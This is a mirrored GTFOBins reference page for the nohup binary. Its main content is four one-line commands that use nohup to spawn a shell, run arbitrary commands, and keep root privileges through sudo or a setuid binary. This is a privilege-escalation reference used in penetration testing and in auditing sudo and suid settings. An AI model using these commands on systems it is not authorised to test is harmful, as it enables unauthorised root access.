This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-14 07:35:16 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
146b146cd3b8d80bbb4d6525a8ddd87926e535c3
GTFOBins.github.io
/
_gtfobins
/
nohup.md
Andrea Cardaci
8b41830d0b
Add (suid) shell for nohup
2020-03-15 12:18:08 +01:00
339 B
Raw
Blame
History
functions
functions
shell
command
sudo
suid
code
nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
code
COMMAND='/usr/bin/id' nohup "$COMMAND" cat nohup.out
code
sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
code
sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
Reference in New Issue
View Git Blame
Copy Permalink